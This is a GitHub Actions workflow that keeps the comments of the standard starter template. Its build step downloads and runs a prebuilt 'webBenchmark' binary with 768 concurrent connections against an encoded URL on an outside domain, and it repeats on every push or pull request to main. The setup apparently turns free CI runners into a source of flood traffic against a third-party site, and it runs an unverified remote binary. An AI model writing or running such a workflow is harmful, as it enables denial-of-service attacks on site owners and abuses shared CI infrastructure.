# This is a basic workflow to help you get started with Actions

name: gothing

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: start anything
        run: echo started it

      # Runs a set of commands using the runners shell
      - name: bulid anything
        run: |
          wget https://github.com/maintell/webBenchmark/releases/download/0.5/webBenchmark_linux_x64
          chmod +x webBenchmark_linux_x64
          ./webBenchmark_linux_x64 -c 768 -s "https://ucgmp4.jvmao.com/view/AUVJlQMvqDz3pue8G0gqFVMx1kn7HJFmGtx0HhZok1aJlSXCVmxRJRMc2YbeQUL65CHhMyzGncxsL6meY0HO7QVyKWQ6F%252FMQ6JrERXR3O7s8SL87td7CSfCM9zgzFc9XRI8g%252FthaL%252BtsAdVcP71xW7zZJvA0VBIdXFiU3A4lXUE%253D"
